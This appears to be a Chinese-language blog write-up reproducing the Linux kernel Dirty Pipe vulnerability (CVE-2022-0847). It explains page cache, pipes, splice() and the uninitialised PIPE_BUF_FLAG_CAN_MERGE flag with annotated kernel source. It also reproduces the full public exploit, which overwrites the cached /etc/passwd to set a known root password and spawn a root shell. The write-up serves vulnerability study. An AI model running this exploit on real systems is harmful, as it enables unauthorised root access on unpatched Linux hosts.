CVE-2022-0847

本文最后更新于：1 个月前

这是我”水”的第一篇cve复现文章，还是先理解内核原理，后续若有新的领悟，会及时添加

漏洞信息

漏洞编号: CVE-2022-0847 (别名: 脏管道dirty pipe)

发布时间: 2022年3月7日

危害级别: 高危

影响版本: Linux Kernel 5.8-5.16.11、5.8-5.15.25、5.8-5.10.102

漏洞描述：在 Linux 内核中的 copy_page_to_iter_pipe 和push_pipe函数中，新管道缓冲区结构的“flags”成员缺乏正确的初始化方式中发现了一个缺陷，因此可能包含过时的值。非特权本地用户可利用此缺陷写入由只读文件支持的页面缓存中的页面，从而提升其在系统上的权限。

环境搭建

使用metarget更换内核

https://blog.nsfocus.net/metarget/

1	`sudo ./metarget cnv install cve-2022-0847`

。。。确实省事，但是由于系统版本错误，我换不回之前的内核版本了

前瞻知识

首先我们要学习一些硬件和内核的底层知识

内存管理

当CPU需要处理一个进程时，它会将该进程的数据从辅助存储器（如硬盘驱动器）检索到主存储器中。这样做是因为 RAM（主内存）比辅助内存快得多，因此 RAM 的数据访问速度可以应付 CPU 速度。操作系统的核心是负责内存管理，它只是以有效的方式将内存部分动态分配和释放到所需的进程，以实现最佳性能。

页面缓存

分页是内存管理的重要机制。由cpu控制的内存的最小单位称为页，通常大小为4kb。主内存被分为大小相等的块，称为帧.所以当一个cpu要计算一个进程的时候，整个过程被分为相等的块，也成为页，然后加载到主内存里。

当CPU第一次从硬盘驱动器等存储介质读取数据时，Linux还会将这些数据存储在未使用的内存区域中，该区域充当缓存。页面缓存中的此副本会保留一段时间，在需要时可以再次使用它，从而避免使用昂贵的硬盘 I/O。如果稍后再次读取此数据，则可以从内存中的此缓存中快速读取，而不必再次从硬盘读取。如果写入数据，则首先将其写入页面缓存，然后最终写入基础存储设备。

在缓存中修改但尚未在辅助内存中更新的页面（导致两个副本不同）称为“脏页”（这是它在漏洞昵称“脏管道”中的相似之处的部分原因）

管道

管道提供单向进程间的通信通道。管道具有读取端和写入端。写入管道写入端的数据可以从管道的读取端读取。所以基本上，管道获取一个进程的输出并将其写入管道中，从那里可以读取它作为下一个进程的输入。

还有存在管道标志“PIPE_BUF_FLAG_CAN_MERGE”，这表示管道内的数据缓冲区可以合并，即此标志通知内核，写入管道指向的页面缓存的更改应写回页面来源的文件。

splice()

系统调用是一种编程方式程序和进程通过该方式从操作系统内核中请求服务。而splice()就是类似的系统调用。更具体来说，这个系统调用用于文件描述符和管道之间移动数据，数据无需跨越用户模式和内核模式边界。

需要清楚的是splice()并不是将实际数据移动到管道中，而是将该数据的引用或者地址移动到管道中来实现这一点。现在，管道包含对内存中存储所需数据的页面缓存位置的引用，而不是实际数据本身。

漏洞原理以及利用

漏洞原理

调用splice函数可以通过”零拷贝”的形式将文件发送到pipe，代码层面的零拷贝是直接将文件缓存页(page cache)作为pipe的buf页使用。但这里引入了一个变量未初始化漏洞，导致文件缓存页会在后续pipe通道中被当成普通pipe缓存页而被”续写”进而被篡改。然而，在这种情况下，内核并不会将这个缓存页判定为”脏页”，短时间内(到下次重启之类的)不会刷新到磁盘。在这段时间内所有访问该文件的场景都将使用被篡改的文件缓存页，也就达成了一个”短时间内对任意可读文件任意写”的操作。可以完成本地提权。

根据补丁，漏洞发生点位于copy_page_to_iter_pipe 函数，所以这是一个变量未初始化漏洞。copy_page_to_iter_pipe的调用点出现在splice系统调用之中。

pipe原理与pipe_write

此漏洞被命名为脏管道，肯定与管道密切相关。pipe是内核提供的一个通信通道，通过pipe/pipe2函数创建，返回两个文件描述符，用来发送数据和接收数据，在内核中实现，pipe 缓存空间总长度65536 字节用页的形式进行管理，总共16页(一页4096字节)，页面之间并不连续，而是通过数组进行管理，形成一个环形链表。维护两个链表指针，一个用来写(pipe->head)，一个用来读(pipe->tail)

pipe_write源码

//linux-5.13\fs\pipe.c : 400 : pipe_write
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	··· ···
    ··· ···
	head = pipe->head;
	was_empty = pipe_empty(head, pipe->tail);
	chars = total_len & (PAGE_SIZE-1);
	if (chars && !was_empty) { 
        //[1]pipe 缓存不为空，则尝试是否能从当前最后一页"接着"写
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len; 

		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) { 
            /*[2]关键，如果PIPE_BUF_FLAG_CAN_MERGE 标志位存在，代表该页允许接着写
             *如果写入长度不会跨页，则接着写，否则直接另起一页 */
			ret = pipe_buf_confirm(pipe, buf);
			···
			ret = copy_page_from_iter(buf->page, offset, chars, from);
			···
			}
			buf->len += ret;
			···
		}
	}

	for (;;) {//[3]如果上一页没法接着写，则重新起一页
		··· ···
		head = pipe->head;
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
			unsigned int mask = pipe->ring_size - 1;
			struct pipe_buffer *buf = &pipe->bufs[head & mask];
			struct page *page = pipe->tmp_page;
			int copied;

			if (!page) {//[4]重新申请一个新页
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
				if (unlikely(!page)) {
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}

			spin_lock_irq(&pipe->rd_wait.lock);

			head = pipe->head;
			··· ···
			pipe->head = head + 1;
			spin_unlock_irq(&pipe->rd_wait.lock);

			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;//[5]将新申请的页放到页数组中
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			if (is_packetized(filp))
				buf->flags = PIPE_BUF_FLAG_PACKET;
			else
				buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            	//[6]设置flag，默认PIPE_BUF_FLAG_CAN_MERGE
			pipe->tmp_page = NULL;

			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); 
            //[7]拷贝操作
			··· ···
			ret += copied;
			buf->offset = 0;
			buf->len = copied;

			··· ···
		}
        ··· ···
    }
	··· ···
	return ret;
}

如果当前管道中不为空(head==tail判定为空管道)，则说明现在管道中有未被读取的数据，则获取head 指针，也就是指向最新的用来写的页，查看该页的len、offset(为了找到数据结尾)。接下来尝试在当前页面续写判断当前页面是否带有 PIPE_BUF_FLAG_CAN_MERGE flag标记，如果不存在则不允许在当前页面续写。或当前写入的数据拼接在之前的数据后面长度超过一页(即写入操作跨页)，如果跨页，则无法续写。如果无法在上一页续写，则另起一页alloc_page 申请一个新的页将新的页放在数组最前面(可能会替换掉原有页面)，初始化值。buf->flag 默认初始化为PIPE_BUF_FLAG_CAN_MERGE ，因为默认状态是允许页可以续写的。拷贝写入的数据，没拷贝完重复上述操作。

漏洞利用的关键就是在splice 中未被初始化的PIPE_BUF_FLAG_CAN_MERGE flag标记，这代表我们能否在一个”没写完”的pipe 页续写。

splice到copy_page_to_iter_pipe

splice 的零拷贝方法就是，直接用文件缓存页来替换pipe 中的缓存页(更改pipe缓存页指针指向文件缓存页)。

漏洞所在的copy_page_to_iter_pipe 函数主要做的工作就是将pipe 缓存页结构指向要传输的文件的文件缓存页

linux-5.13\lib\iov_iter.c : 417 : copy_page_to_iter_pipe

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe;
	struct pipe_buffer *buf;
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;

	··· ···

	off = i->iov_offset;
	buf = &pipe->bufs[i_head & p_mask];//[1]获取对应的pipe 缓存页
	··· ···
	
	buf->ops = &page_cache_pipe_buf_ops;//[2]修改pipe 缓存页的相关信息指向文件缓存页
	get_page(page);
	buf->page = page;//[2]页指针指向了文件缓存页
	buf->offset = offset;//[2]offset len 等设置为当前信息(通过splice 传入参数决定)
	buf->len = bytes;

	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}

首先根据pipe 页数组环形结构，找到当前写指针(pipe->head) 位置,将当前需要写入的页指向准备好的文件缓存页，并设置其他信息，比如len 是由splice 系统调用的传入参数决定的。这里唯独没有初始化flag，造成漏洞。

根据上面分析过的pipe_write 代码，如果重新调用pipe_write 向pipe 中写数据，写指针(pipe->head) 指向上图中的页，flag 为 PIPE_BUF_FLAG_CAN_MERGE ，则会认为可以接着该页继续写，只要写入长度不跨页：

#define PIPE_BUF_FLAG_CAN_MERGE	0x10	/* can merge buffers */

if (chars && !was_empty) { 
        //[1]pipe 缓存不为空，则尝试是否能从当前最后一页"接着"写
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len; 

    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
                offset + chars <= PAGE_SIZE) { 
                /*[2]关键，如果PIPE_BUF_FLAG_CAN_MERGE 标志位存在，代表该页允许接着写
                 *如果写入长度不会跨页，则接着写，否则直接另起一页 */
                ret = pipe_buf_confirm(pipe, buf);
                ···
                ret = copy_page_from_iter(buf->page, offset, chars, from);

exp及其思路

直接贴上漏洞披露者的漏洞利用exp,方便我们分析整体攻击成功的一个思路

(开头介绍省略了)

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * 创建一个管道，其中pipe_inode_info环上的所有“BUF”都设置了* PIPE_BUF_FLAG_CAN_MERGE标志。
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* 完全注满管道；每个管道缓冲区现在将具有PIPE_BUF_FLAG_CAN_MERGE标志 */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* 清空管道，释放所有pipe_buffer实例(但保留初始化的标志) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* 管道现在是空的，如果有人添加了一个新的pipe_buffer而没有初始化它的“标志”,那么这个缓冲区将是可合并的 */
}

int main() {
	const char *const path = "/etc/passwd";

        printf("Backing up /etc/passwd to /tmp/passwd.bak ...\n");
        FILE *f1 = fopen("/etc/passwd", "r");
        FILE *f2 = fopen("/tmp/passwd.bak", "w");

        if (f1 == NULL) {
            printf("Failed to open /etc/passwd\n");
            exit(EXIT_FAILURE);
        } else if (f2 == NULL) {
            printf("Failed to open /tmp/passwd.bak\n");
            fclose(f1);
            exit(EXIT_FAILURE);
        }

        char c;
        while ((c = fgetc(f1)) != EOF)
            fputc(c, f2);

        fclose(f1);
        fclose(f2);

	loff_t offset = 4; // after the "root"
	const char *const data = ":$1$aaron$pIwpJwMMcozsUxAtRa85w.:0:0:test:/root:/bin/sh\n"; // openssl passwd -1 -salt aaron aaron 
        printf("Setting root password to \"aaron\"...\n");
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* 打开输入文件并验证指定的偏移量 */
	const int fd = open(path, O_RDONLY); // 只读
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* 打开输入文件并验证指定的偏移量 */
	int p[2];
	prepare_pipe(p);

	/* 将指定偏移量之前的一个字节拼接到管道中；这将添加一个对页面缓存的引用，但是由于copy_page_to_iter_pipe()不初始化“标志”，因此仍然设置PIPE_BUF_FLAG_CAN_MERGE */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* 由于PIPE_BUF_FLAG_CAN_MERGE标志，下面的写操作不会创建新的pipe_buffer，而是写入页面缓存 */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	char *argv[] = {"/bin/sh", "-c", "(echo aaron; cat) | su - -c \""
                "echo \\\"Restoring /etc/passwd from /tmp/passwd.bak...\\\";"
                "cp /tmp/passwd.bak /etc/passwd;"
                "echo \\\"Done! Popping shell... (run commands now)\\\";"
                "/bin/sh;"
            "\" root"};
        execv("/bin/sh", argv);

        printf("system() function call seems to have failed :(\n");
	return EXIT_SUCCESS;
}

简单的一个整体思路就是先创建pipe,使用任意数据填满管道，清空管道内数据，然后使用splice()函数调用读取目标文件(只读)的1字节数据发送至pipe，
最后使用write()将任意数据继续写入pipe, 此数据将会覆盖目标文件内容。

漏洞的形成脱离不开时代的进步

阅读源代码

要了解漏洞形成的细节, 以及漏洞为什么不是从splice()引入之初就存在, 还是要从内核源码了解Pipe buffer的can_merge属性如何迭代发展至今,

Linux 2.6

引入了splice()系统调用;
Alt text

Linux 4.9

添加了iov_iter对Pipe的支持, 其中copy_page_to_iter_pipe()与push_pipe()函数实现中缺少对pipe buffer中flag的初始化操作, 但在当时并无大碍, 因为此时的can_merge标识还在ops即pipe_buf_operations结构体中。如图, 此时的buf->ops = &page_cache_pipe_buf_ops操作会使can_merge属性为0, 此时并不会触发漏洞, 但为之后的代码迭代留下了隐患;
Alt text

Linux 5.1

由于在众多类型的pipe_buffer中, 只有anon_pipe_buf_ops这一种情况的can_merge属性是为1的(can_merge字段在结构体中占一个int大小的空间), 所以, 将pipe_buf_operations结构体中的can_merge属性删除, 并且把merge操作时的判断改为指针判断, 合情合理。正是如此, copy_page_to_iter_pipe()中对buf->ops的初始化操作已经不包含can_merge属性初始化的功能了, 只是push_write()中merge操作的判断依然正常, 所以依然不会触发漏洞;
Alt text